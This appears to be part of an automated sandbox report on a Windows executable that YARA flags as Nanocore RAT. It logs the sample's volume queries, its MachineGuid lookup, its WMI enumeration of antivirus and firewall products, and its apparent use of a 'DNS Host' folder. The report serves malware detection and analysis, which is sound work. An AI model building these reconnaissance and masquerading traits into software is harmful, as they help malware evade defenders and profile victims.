Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Program Files (x86)\DNS Host\dnshost.exe VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Program Files (x86)\DNS Host\dnshost.exe VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Program Files (x86)\DNS Host\dnshost.exe VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Code function: 5_2_078E1D70 GetSystemTimes,

5_2_078E1D70

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.25.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c7b7e6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
